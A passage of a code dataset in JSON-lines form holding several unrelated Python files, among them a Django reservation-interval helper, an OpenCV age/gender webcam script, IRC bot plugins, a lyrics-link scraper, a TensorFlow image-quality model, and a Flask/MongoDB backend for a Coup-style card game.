\"))\nfor i in range(M):\n A.append(random.randrange(-10, 20, 1))\nprint(A)\nfor j in range(0,M,2):\n if A[j] == 0:\n print(j)\n \n \n\n\n","sub_path":"SomeTasks/secondLab.py","file_name":"secondLab.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"75052874","text":"\n\nimport portion as Interval\n\nfrom django.db.models import Q\nfrom ..models import Guide, GuidableTime, Reservation\n\n# class GuidabTimeIntval:\n\ndef prelim_cand_interval(guidable_time_obj,\n request_time_from, request_time_to):\n\n already_reservs = Reservation.objects.filter(\n Q(guidable_time__guide = guidable_time_obj.guide,\n reservation_time_from__gte = request_time_from,\n reservation_time_from__lt = request_time_to,\n ) |\n Q(guidable_time__guide = guidable_time_obj.guide,\n reservation_time_to__gte = request_time_from,\n reservation_time_to__lt = request_time_to,\n )).distinct()\n\n guide_intval = Interval.open(guidable_time_obj.guidable_time_from,\n guidable_time_obj.guidable_time_to)\n request_intval = Interval.open(request_time_from,\n request_time_to)\n cand_intval = guide_intval & request_intval\n\n return already_reservs, cand_intval\n\ndef extract_guidable_time_intervals(guidable_time_obj,\n request_time_from, request_time_to):\n\n already_reservs, cand_intvals = prelim_cand_interval(guidable_time_obj,\n request_time_from,\n request_time_to)\n\n for already_reserv in already_reservs:\n already_reserv_intval = Interval.open(already_reserv.reservation_time_from,\n already_reserv.reservation_time_to)\n cand_intvals -= already_reserv_intval\n\n if cand_intvals.empty:\n return []\n else:\n return [ cand_intval for cand_intval in list(cand_intvals)\n if cand_intval.upper > cand_intval.lower ]\n\ndef check_avail_full_interval(guidable_time_obj,\n request_time_from, request_time_to):\n\n already_reservs, cand_intvals = prelim_cand_interval(guidable_time_obj,\n request_time_from,\n request_time_to)\n\n req_intval = Interval.open(request_time_from, request_time_to)\n\n remain_intval = req_intval\n\n for already_reserv in already_reservs:\n # print(remain_intval, already_reserv)\n remain_intval -= Interval.open(already_reserv.reservation_time_from,\n already_reserv.reservation_time_to)\n # print(\"--->\", remain_intval)\n\n return remain_intval == req_intval\n\n","sub_path":"appGuide/modules/search_guidable_time_intervals1_1.py","file_name":"search_guidable_time_intervals1_1.py","file_ext":"py","file_size_in_byte":2599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"385842928","text":"import cv2\nimport pafy\nimport numpy as np\n\npath_classifier = './premodels/haarcascade_frontalface_default.xml'\n# Load the cascade\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n\n## Get user option\nprint('Input video URL to analyse or 0 to use webcam')\ninp = input()\nif inp=='0':\n inp=int(inp)\nelse:\n vPafy = pafy.new(inp)\n play = vPafy.getbest(preftype='mp4')\n inp = play.url\n \ncap = cv2.VideoCapture(inp)\n\n## Fixed Values\nMODEL_MEAN_VALUES = (78.4263377603, 87.7689143744, 114.895847746)\nage_list = ['(0, 2)', '(4, 6)', '(8, 12)', '(15, 20)', '(25, 32)', '(38, 43)', '(48, 53)', '(60, 100)']\ngender_list = ['Male', 'Female']\nfont = cv2.FONT_HERSHEY_SIMPLEX\n\n## LOAD CAFFE MODELS\nage_net = cv2.dnn.readNetFromCaffe('./premodels/deploy_age.prototxt', './premodels/age_net.caffemodel')\ngender_net = cv2.dnn.readNetFromCaffe('./premodels/deploy_gender.prototxt', './premodels/gender_net.caffemodel')\n\n\n\nwhile True:\n _, img = cap.read()\n #if not hasFrame & inp!=0:\n # cv2.waitKey()\n # break\n \n face_cascade = cv2.CascadeClassifier(path_classifier)\n \n # Convert to grayscale\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n # Detect the faces\n faces = face_cascade.detectMultiScale(gray, 1.1, 5)\n \n \n # Draw the rectangle around each face\n for (x, y, w, h) in faces:\n print('cai')\n cv2.rectangle(img, (x, y), (x+w, y+h), (255, 0, 0), 2)\n # Get Face\n face_img = img[y:y+h, h:h+w].copy()\n blob = cv2.dnn.blobFromImage(face_img, 1, (227,227), MODEL_MEAN_VALUES, swapRB=False)\n \n print(face_img)\n \n # Predict Age\n age_net.setInput(blob)\n age_preds = age_net.forward()\n age = age_list[age_preds[0].argmax()]\n \n # Predict Gender\n gender_net.setInput(blob)\n gender_preds = gender_net.forward()\n gender = gender_list[gender_preds[0].argmax()]\n \n \n ## Display age and gender\n \n overlay_text = \"%s %s\" % (gender,age)\n cv2.putText(img, overlay_text, (x,y),font,1,(255,255,255), 2, cv2.LINE_AA)\n \n \n ## Display\n cv2.imshow('img', img)\n # Stop if escape key is pressed\n k = cv2.waitKey(30) & 0xff\n if k==27:\n break\n# Release the VideoCapture object\ncap.release()","sub_path":".ipynb_checkpoints/video-checkpoint.py","file_name":"video-checkpoint.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"358412231","text":"'''\nCreated on Sep 19, 2014\n\n@author: starchmd\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n'''\nimport shelve\nimport atexit\n'''\nContains the standard plugins created by Tyler et. al.\n Parrot - Standard responses to standard command.\n Padiwan - Allows learning of new parrot commands.\n Help - Sends the help.\n'''\nclass ParrotPlugin(object):\n '''\n Repeats specific responses for specific inputs.\n '''\n def __init__(self, conn):\n # Map from keywords to how the bot will respond in chat.\n self.conn = conn\n self.responces = {\n \"ack\": \"ack\",\n \"git\": \"#gitpush\",\n \"aye\": \"aye, mate!\",\n \"+1\": \"+1\",\n \"boom\": \"kaboom!!!\",\n \"beum\": \"kabeum!!!\",\n \"bewm\": \"ba-bewm!!!\",\n \"seen\": \"seen like an eaten jelly bean\"}\n \n def run(self,user,message):\n ''' Responds to input '''\n #Don't spam on commands\n if self.conn.isPersonal(message):\n return\n for key in self.responces:\n if key in message:\n self.conn.send((self.responces[key] + \" \") * message.count(key, 0))\n def list(self):\n '''Reports default commands.'''\n return {\"Default Commands: \":self.responces.keys()}\n \nclass Padiwan(ParrotPlugin):\n def __init__(self,conn):\n ''' Init '''\n super(Padiwan,self).__init__(conn)\n self.defaults = self.responces\n self.authors = {}\n self.responces = shelve.open(\"autoack.shelf\")\n atexit.register(self.responces.close)\n def learn(self,cmd,response, user):\n ''' Learn a command '''\n if cmd not in self.defaults:\n self.conn.send((\"Relearned\" if cmd in self.responces else \"Learned\")+ \" \"+cmd)\n self.responces[cmd] = \" \".join(response)\n self.authors[cmd] = user\n else:\n self.conn.send(\"Go away, \" + user + \"!\")\n def forget(self,cmd):\n ''' Forget a command '''\n if cmd in self.defaults:\n self.conn.send(\"No.\")\n elif cmd in self.responces:\n self.responces.pop(cmd) \n self.conn.send(\"Dropped like a bad habit.\")\n else:\n self.conn.send(\"Maybe you're the one forgetting...\")\n \n def run(self,user,message):\n '''Runs a command'''\n cmd = self.conn.getCommand(message)\n args = self.conn.getArgs(message)\n if cmd == \"learn\" and len(args) >= 2:\n self.learn(args[0],args[1:],user)\n elif cmd == \"forget\" and len(args) == 1:\n self.forget(args[0])\n elif cmd == \"blame\" and len(args) == 1:\n self.conn.send(args[0] + \" was created by \" + self.authors[args[0]], user)\n elif cmd == \"learn\" or cmd == \"forget\" or cmd == \"blame\":\n self.conn.send(\"Incomplete command.\",user)\n else:\n super(Padiwan,self).run(user,message)\n def list(self):\n '''Reports learned commands.'''\n return {\"Learned Commands: \":self.responces.keys()} \n\nclass Help(object):\n def __init__(self,conn):\n '''Initialize yo'''\n self.conn = conn\n def list(self):\n ''' Do nothing '''\n pass\n def run(self,user,message):\n ''' Check for help, and print help. '''\n cmd = self.conn.getCommand(message)\n if cmd == \"help\":\n nick = self.conn.getNick()\n self.conn.send(\"Available commands:\")\n self.conn.send(\" \" + nick + \": autotweet (monitor the defined twitter account and AutoAck Tweets)\")\n self.conn.send(\" \" + nick + \": blame [key] (show user who created [key])\")\n self.conn.send(\" \" + nick + \": forget [key] (forget user learned keyword [key])\")\n self.conn.send(\" \" + nick + \": help (print this help message)\") \n self.conn.send(\" \" + nick + \": learn [key] [value] (learn to say [value] after [key])\")\n self.conn.send(\" \" + nick + \": list (print list of available keywords)\")\n self.conn.send(\" \" + nick + \": quiet [seconds] (don't talk for optional number of [seconds])\")\n self.conn.send(\" \" + nick + \": speak (override a previous quiet command)\")\n self.conn.send(\" \" + nick + \": tweet (send a tweet to the defined twitter account)\") \n ","sub_path":"plugins/standard.py","file_name":"standard.py","file_ext":"py","file_size_in_byte":4778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"113781372","text":"from urllib.request import urlopen\nfrom bs4 import BeautifulSoup as bs\n\nhtml_page = urlopen('https://francechansons.net/alain-souchon-liste-de-chansons/')\nsoup = bs(html_page, 'lxml')\n\nentry_content_div=soup.find(\"div\", class_=\"entry-content\")\nul = entry_content_div.find(\"ul\").find_all_next('li')\nfor link in ul:\n url = link.find_next('a')['href']\n # ('a')['href']\n if 'francechansons' not in url:\n print(\"https://francechansons.net/\"+url)\n else:\n print(url)\n# print('liesssssss', ul)\n# li = ul.find('li')\n# children = ul.findChildren(\"a\")\n# for child in children:\n# print(child)\n# print(\"https://francechansons.net/\" + child['href'])\n","sub_path":"scrapy_projt/soup_scrapy/b_soup_france.py","file_name":"b_soup_france.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"560849041","text":"import tensorflow as tf\n\nimport tf_util as U\n\n\nclass Model:\n\tdef __init__(self, loss = \"weighted\"):\n\t\tself.loss = loss\n\t\tself.prob = tf.placeholder(shape = (), dtype = tf.float32)\n\t\tself.lr = tf.placeholder(shape = (), dtype = tf.float32)\n\t\tself.n_patches = 64\n\t\tself.output = self.loss_op = self.train_op = None\n\n\t@staticmethod\n\tdef block(net, filters):\n\t\twith tf.variable_scope('block_' + str(filters)):\n\t\t\tnet = U.conv2d(net, filters, 'conv1', (3, 3))\n\t\t\tnet = U.swish(net)\n\t\t\tnet = U.conv2d(net, filters, 'conv2', (3, 3))\n\t\t\tnet = U.swish(net)\n\t\t\tnet = U.maxpool(net, 2)\n\t\treturn net\n\n\tdef build(self, image, mos_score):\n\t\tnet = tf.reshape(image, [-1, 32, 32, 3])\n\t\tnet = self.block(net, 32)\n\t\tnet = self.block(net, 64)\n\t\tnet = self.block(net, 128)\n\t\tnet = self.block(net, 256)\n\t\tnet = self.block(net, 512)\n\n\t\tnet1 = tf.reshape(net, (-1, 512))\n\t\tnet1 = U.dense(net1, 512, 'fc1')\n\t\tnet1 = U.swish(net1)\n\t\tnet1 = tf.nn.dropout(net1, keep_prob = self.prob)\n\t\tnet1 = U.dense(net1, 1, 'fc2')\n\n\t\tnet2 = tf.reshape(net, (-1, 512))\n\t\tnet2 = U.dense(net2, 512, 'fc1_weight')\n\t\tnet2 = U.swish(net2)\n\t\tnet2 = tf.nn.dropout(net2, keep_prob = self.prob)\n\t\tnet2 = U.dense(net2, 1, 'fc2_weight')\n\t\tnet2 = tf.nn.relu(net2) + 1e-6\n\n\t\tself.loss_op = self.weighted_loss(net1, net2, mos_score)\n\n\t\toptimizer = tf.train.AdamOptimizer(self.lr)\n\t\tself.train_op = optimizer.minimize(self.loss_op)\n\n\tdef weighted_loss(self, h, a, t):\n\t\tself.output = 0\n\n\t\th = tf.reshape(h, (-1, self.n_patches))\n\t\ta = tf.reshape(a, (-1, self.n_patches))\n\t\tha = tf.multiply(h, a)\n\t\tha_sum = tf.reduce_sum(ha, axis = 1)\n\t\ta_sum = tf.reduce_sum(a, axis = 1)\n\n\t\ty = tf.divide(ha_sum, a_sum)\n\t\tdiff = tf.abs(y - t)\n\t\tloss = tf.reduce_mean(diff)\n\t\treturn loss\n","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"223755949","text":"\"\"\"\r\nNewSucc\r\nLoads vocabulary from NewSucces, creates a Dictionary for each UNIT,\r\nputs all the units in a tuple\r\n\"\"\"\r\n\r\nsource = \"NewSucc_INT.txt\"\r\n\r\ndef create_dic(file):\r\n dic = {} #dictionary, one for each unit\r\n vocab = [] #list for all units\r\n doc = open(file, \"r\") #opens file\r\n prev_word = 0\r\n #dot = 44\r\n was_unit = False #was the previous line was the name of the unit\r\n prev_line = None #the whole previous line\r\n wordS = \"\" #the slovak word\r\n wordE = \"\" #the english word\r\n loading_slovak = False #should program load slovak word\r\n ignore_letter = False #should program ignore the current letter\r\n ignore_lines = 0 #how many lines should the program ignore\r\n \r\n def save_wordS(wordSk, wordEn, cut):\r\n \"\"\"\r\n wordSk- slovak word\r\n wordEn- translation of the slovak words\r\n cut- the word that is supposed to be be cut from the end of wordSk\r\n \"\"\"\r\n wordS = wordSk[2:]\r\n wordS = wordS[:wordS.find(cut)]\r\n wordS = wordS.strip()\r\n wordE = wordEn.strip()\r\n for i in range(2):\r\n if \"\\n\" in wordS:\r\n wordS = wordS.replace(\"\\n\", \" \")\r\n if \".\" in wordS:\r\n wordS = wordS[wordS.find(\".\")+3:]\r\n return wordE, wordS\r\n \r\n for line in doc: #loops through each line\r\n if \"NEW SUCCESS – INTERMEDIATE\" in line:\r\n ignore_lines = 2\r\n elif ignore_lines > 0:\r\n ignore_lines += -1\r\n elif line[0].isalpha():\r\n if \"UNIT\" in line:\r\n if \"UNIT 1\" not in line and len(line) == 7:\r\n saved_words = save_wordS(wordS, wordE, wordE)\r\n dic[saved_words[0]] = saved_words[1]\r\n wordS = \"\"\r\n loading_slovak = False\r\n was_unit = True\r\n vocab.append(dic)\r\n dic = {}\r\n else:\r\n for letter in range(len(line)):\r\n if line[letter] == \"]\":\r\n ignore_letter = False\r\n if line[letter] == \"[\":\r\n ignore_letter = True\r\n prev_wordE = wordE\r\n if \"phrv\" in line:\r\n wordE = line[prev_word:line.find(\"phrv\")]\r\n elif (line[letter-2] == \"v\" or line[letter-2] == \"n\") and line[letter-3] == \" \":\r\n wordE = line[prev_word:letter-3]\r\n elif line[letter-4:letter-1] == \"adj\" or line[letter-4:letter-1] == \"adv\":\r\n wordE = line[prev_word:letter-4]\r\n elif \"(adj, v)\" in line:\r\n wordE = line[prev_word:line.find(\"(adj, v)\")]\r\n else:\r\n wordE = line[prev_word:letter-1]\r\n \r\n if not was_unit:\r\n saved_words = save_wordS(wordS, prev_wordE, wordE)\r\n dic[saved_words[0]] = saved_words[1]\r\n wordS = \"\"\r\n loading_slovak = False\r\n \r\n if not ignore_letter and (line[letter] == \".\" or line[letter] == \"!\" or line[letter] == \"?\"):\r\n #dot = letter\r\n loading_slovak = True\r\n\r\n if loading_slovak:\r\n wordS = wordS + line[letter]\r\n prev_line = line\r\n was_unit = False\r\n \r\n saved_words = save_wordS(wordS, wordE, wordE)\r\n dic[saved_words[0]] = saved_words[1]\r\n vocab.append(dic)\r\n return vocab\r\n\r\nif __name__ == \"__main__\":\r\n vocab = create_dic(source)\r\n n = 0\r\n\r\n def debug(unit):\r\n for a, s in vocab[unit].items():\r\n if s == \"\":\r\n print(a + \": \" + s)\r\n if \"[\" in a or \"]\" in a or \"[\" in s or \"]\" in s:\r\n print(a + \": \" + s)\r\n def print_all(unit):\r\n for a, s in vocab[unit].items():\r\n print(a + \": \" + s)\r\n \r\n #debug(9)\r\n print(vocab)\r\n","sub_path":"Web/web/test/CreateDic.py","file_name":"CreateDic.py","file_ext":"py","file_size_in_byte":4175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"634151565","text":"\ntry:\n from setuptools import setup\n extra = dict(test_suite=\"tests.test.suite\", include_package_data=True, test_requires=[])\nexcept ImportError:\n from distutils.core import setup\n extra = {}\n\n\npackages=[\n \"ebu_tt_live\",\n \"ebu_tt_live.bindings\",\n \"ebu_tt_live.clocks\",\n \"ebu_tt_live.scripts\"\n]\n\n\nsetup(\n name=\"ebu-tt-live\",\n version=\"0.0.1\",\n description=\"EBU-TT Part 3 library implementing Specification EBU-3370\",\n install_requires=[\n \"PyXB\",\n \"ipdb\" # This will eventually be removed from here\n ],\n license=\"BSD3\",\n packages=packages,\n entry_points={\n 'console_scripts': [\n 'ebu-dummy-encoder = ebu_tt_live.scripts.ebu_dummy_encoder:main',\n 'ebu-interactive-shell = ebu_tt_live.scripts.ebu_interactive_shell:main'\n ]\n }\n)","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"431845007","text":"#!/usr/bin/env python3\n\nfrom flask import Flask, render_template, redirect, url_for, request, escape, jsonify\nfrom flask_socketio import SocketIO, join_room, leave_room, send, emit\napp = Flask(__name__, instance_relative_config=True)\napp.config.from_pyfile('config.py')\nsocketio = SocketIO(app)\nimport json\nimport random\nimport copy\nimport uuid\nimport pymongo\n\ndb_prefix = '/var/www/BlandGames/'\nmyclient = pymongo.MongoClient(app.config[\"MONGOSTRING\"])\nmydb = myclient[\"dev_db\"]\n\n@app.route('/mon')\ndef mongo():\n rooms = mydb[\"room\"]\n rooms.drop()\n\n rc = RC(rooms)\n random.seed(0)\n import pprint\n pp = pprint.PrettyPrinter(indent=4)\n rc.create_room('sk', 'p1', True, 'Spanish Flu')\n rc.join_room('sk', 'p2')\n rc.join_room('sk', 'p3')\n rc.join_room('sk', 'p4')\n rc.modify_room('sk', 'started')\n action_params = dict()\n action_params[\"user_name\"] = \"p2\"\n action_params[\"action\"] = \"income\"\n rc.modify_room('sk', 'play_action', action_params) # fail cuz not his turn\n action_params = dict()\n action_params[\"user_name\"] = \"p3\"\n action_params[\"action\"] = \"income\"\n rc.modify_room('sk', 'play_action', action_params)\n action_params = dict()\n action_params[\"user_name\"] = \"p4\"\n action_params[\"action\"] = \"foreign_aid\"\n rc.modify_room('sk', 'play_action', action_params)\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p1\", action=\"allow\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p2\", action=\"allow\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p3\", action=\"allow\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p1\", action=\"foreign_aid\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p2\", action=\"block\")) # rightful duke doing a righteous block\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p1\", action=\"allow\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p3\", action=\"allow\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p4\", action=\"allow\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p2\", action=\"foreign_aid\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p1\", action=\"block\")) # another rightful duke doing a righteous challenge\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p2\", action=\"challenge\")) # p2 makes an erroneous challenge\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p1\", action=\"reveal0\")) # p1 prooves he is the duke\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p2\", action=\"discard0\")) # gotta pay for your erroneous challenge\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p3\", action=\"foreign_aid\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p1\", action=\"block\")) # p1 blocks but is no longer the duke\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p3\", action=\"challenge\")) # p3 makes a correct accusation p1 will have to pay\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p1\", action=\"reveal1\")) # p1 has to grave something\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p4\", action=\"tax\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p1\", action=\"stealp2\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p2\", action=\"stealp4\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p3\", action=\"stealp4\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p4\", action=\"tax\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p2\", action=\"block\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p1\", action=\"stealp4\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p2\", action=\"stealp4\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p3\", action=\"assassinatep4\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p4\", action=\"discard0\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p4\", action=\"income\")) # this was added in late when a bug was fixed\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p1\", action=\"exchange\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p1\", action=\"doublediscard0_2\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p2\", action=\"income\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p3\", action=\"infectp1\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p1\", action=\"discard0\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p4\", action=\"income\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p2\", action=\"tax\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p3\", action=\"tax\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p4\", action=\"tax\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p2\", action=\"tax\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p3\", action=\"tax\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p4\", action=\"tax\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p2\", action=\"tax\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p3\", action=\"tax\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p4\", action=\"tax\")) # lets test out what happens when you have 10 coins\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p2\", action=\"steamp3\")) # he must infect\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p2\", action=\"tax\")) # fails\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p2\", action=\"income\")) # fails\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p2\", action=\"foreign_aid\")) # fails\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p2\", action=\"assassinatep4\")) # fails\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p2\", action=\"infectp3\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p3\", action=\"discard0\"))\n\n myquery = dict()\n for item in rooms.find(myquery):\n pp.pprint(item)\n\n\n #x = mycoll.insert_one(dict(user_name='steve'))\n #print(x.inserted_id)\n #myquery = dict(user_name='steve')\n #for item in mycoll.find(myquery):\n # print(item)\n #print(myclient.list_database_names())\n # game is one mongodb document and if two people access something at the same time their browser is just told to try again and it does\n # mycoll.drop()\n return jsonify(dict(hi=1))\n\nclass RC:\n def __init__(self, rooms):\n self.rooms = rooms\n def create_room(self, room_name, game_master, is_private=False, game_name=''):\n if self.rooms.find({\"room_name\": room_name}).count() > 0:\n # If the room exists, join the room\n return self.join_room(room_name, game_master)\n game_params = dict()\n if game_name == 'Spanish Flu':\n game_params[\"approval_timer\"] = \"disabled\"\n # game_params[\"approval_timer\"] = \"infinite\"\n game_params[\"keep_grave_sorted\"] = True\n return self.rooms.insert_one(dict(room_name=room_name,\n game_master=game_master,\n is_private=is_private,\n game_name=game_name,\n players=[game_master],\n game_state='waiting',\n game_data=dict(),\n game_params=game_params))\n def delete_room(self, room_name):\n query={\"room_name\": room_name}\n self.rooms.delete_many(query)\n def join_room(self, room_name, user_name):\n if self.rooms.find({\"room_name\": room_name}).count() == 0:\n room = self.create_room(room_name, user_name)\n room = self.rooms.find_one({\"room_name\": room_name})\n myquery={\"room_name\": room_name}\n players = []\n if \"players\" in room:\n players = room[\"players\"]\n if user_name not in players:\n players.append(user_name)\n newvalues = {\"$set\": {\"players\": players}}\n self.rooms.update_one(myquery, newvalues)\n print(room)\n return room is not None\n def modify_room(self, room_name, action, params=dict()):\n changed = False\n query={\"room_name\": room_name}\n if action == 'waiting':\n query={\"room_name\": room_name}\n newvalues = {\"$set\": {\"game_state\": \"waiting\"}}\n self.rooms.update_one(query, newvalues)\n changed = True\n elif action == 'started':\n query={\"room_name\": room_name, \"game_state\": \"waiting\",\n \"game_name\": \"Spanish Flu\"}\n room = self.rooms.find_one(query);\n if room is not None:\n newvalues = {\"$set\": {\n \"game_state\": \"started\",\n \"game_data\": RC.create_game(room)}\n }\n self.rooms.update_one(query, newvalues)\n changed=True\n elif action == 'play_action':\n query={\"room_name\": room_name, \"game_state\": \"started\",\n \"game_name\": \"Spanish Flu\"}\n room = self.rooms.find_one(query);\n if room is not None:\n game_data = RC.action_game(room, params) \n if game_data is not None:\n newvalues = {\"$set\": {\n \"game_data\": game_data}\n }\n self.rooms.update_one(query, newvalues)\n changed = True\n return changed\n\n def get_next_player_name(game_data, last_player):\n players = game_data[\"players\"]\n found_last = False\n for i in range(len(players)*2):\n player = players[i % len(players)]\n if found_last == True and len(player[\"cards\"]) > 0:\n return player[\"user_name\"]\n if player[\"user_name\"] == last_player:\n found_last = True\n return 'this should never happen maybe increase you loop length'\n\n def create_game(room):\n deck = []\n for item in [\"Duke\", \"Contessa\", \"Assassin\", \"Ambassador\", \"Captain\"]:\n for i in range(3):\n deck.append(item)\n random.shuffle(deck)\n players = []\n for item in room[\"players\"]:\n player = dict(user_name=item, coins=2, cards = [])\n for i in range(2):\n if len(deck) > 0:\n player[\"cards\"].append(deck.pop())\n players.append(player)\n grave_yard = []\n action_log = [dict(user_name=room[\"game_master\"], action=\"started\")]\n if len(players) > 0:\n waiting_for = [dict(kind='turn', user_name=random.choice(players)[\"user_name\"])]\n else:\n waiting_for = []\n return dict(deck=deck,\n players=players,\n prev_players=copy.deepcopy(players),\n grave_yard=grave_yard,\n action_log=action_log,\n waiting_for=waiting_for)\n def action_game(room, params):\n # Read some params\n user_name = params[\"user_name\"]\n action = params[\"action\"]\n coins = 0\n for item in room[\"game_data\"][\"players\"]:\n if item[\"user_name\"] == user_name:\n coins = item[\"coins\"]\n\n # Check if action is allowed and expire appropriate waiting_for actions\n # TODO MORE ALLOWED VALIDATION IN HERE LIKE DOES THAT PERSON EXIST OR DO YOU HAVE THE CARDS TO DISCARD\n allowed = False\n for item in room[\"game_data\"][\"waiting_for\"]:\n if action == \"income\" and item[\"kind\"] == \"turn\" and item[\"user_name\"] == user_name and coins < 10:\n room[\"game_data\"][\"waiting_for\"] = []\n allowed = True\n elif action == \"foreign_aid\" and item[\"kind\"] == \"turn\" and item[\"user_name\"] == user_name and coins < 10:\n room[\"game_data\"][\"waiting_for\"] = []\n allowed = True\n elif action == \"tax\" and item[\"kind\"] == \"turn\" and item[\"user_name\"] == user_name and coins < 10:\n room[\"game_data\"][\"waiting_for\"] = []\n allowed = True\n elif action.startswith(\"steal\") and item[\"kind\"] == \"turn\" and item[\"user_name\"] == user_name and coins < 10:\n room[\"game_data\"][\"waiting_for\"] = []\n allowed = True\n elif action.startswith(\"assassinate\") and item[\"kind\"] == \"turn\" and item[\"user_name\"] == user_name and coins < 10 and coins >= 3:\n room[\"game_data\"][\"waiting_for\"] = []\n allowed = True\n elif action == \"exchange\" and item[\"kind\"] == \"turn\" and item[\"user_name\"] == user_name and coins < 10:\n room[\"game_data\"][\"waiting_for\"] = []\n allowed = True\n elif action.startswith(\"doublediscard\") and item[\"kind\"] == \"doublediscard\" and item[\"user_name\"] == user_name:\n room[\"game_data\"][\"waiting_for\"] = []\n allowed = True\n elif action.startswith(\"infect\") and item[\"kind\"] == \"turn\" and item[\"user_name\"] == user_name:\n if coins >= 7:\n room[\"game_data\"][\"waiting_for\"] = []\n allowed=True\n elif action == \"allow\" and item[\"kind\"] == \"block\" and item[\"user_name\"] == user_name:\n room[\"game_data\"][\"waiting_for\"].remove(dict(kind=\"block\", user_name=user_name))\n allowed = True\n elif action == \"allow\" and item[\"kind\"] == \"challenge\" and item[\"user_name\"] == user_name:\n room[\"game_data\"][\"waiting_for\"].remove(dict(kind=\"challenge\", user_name=user_name))\n allowed = True\n elif action == \"block\" and item[\"kind\"] == \"block\" and item[\"user_name\"] == user_name:\n room[\"game_data\"][\"waiting_for\"] = []\n allowed = True\n elif action == \"challenge\" and item[\"kind\"] == \"challenge\" and item[\"user_name\"] == user_name:\n room[\"game_data\"][\"waiting_for\"] = []\n allowed = True\n elif action.startswith(\"reveal\") and item[\"kind\"] == \"reveal\" and item[\"user_name\"] == user_name:\n reveal_index = int(action.replace(\"reveal\", \"\"))\n for player in room[\"game_data\"][\"players\"]:\n if player[\"user_name\"] == user_name:\n if reveal_index >= len(player[\"cards\"]):\n allowed=False\n else:\n room[\"game_data\"][\"waiting_for\"] = []\n allowed = True\n break\n elif action.startswith(\"discard\") and item[\"kind\"] == \"discard\" and item[\"user_name\"] == user_name:\n discard_index = int(action.replace(\"discard\", \"\"))\n for player in room[\"game_data\"][\"players\"]:\n if player[\"user_name\"] == user_name:\n if discard_index >= len(player[\"cards\"]):\n allowed=False\n else:\n room[\"game_data\"][\"waiting_for\"] = []\n allowed = True\n break\n if not allowed:\n return None\n\n # Add the allowed action to the log\n 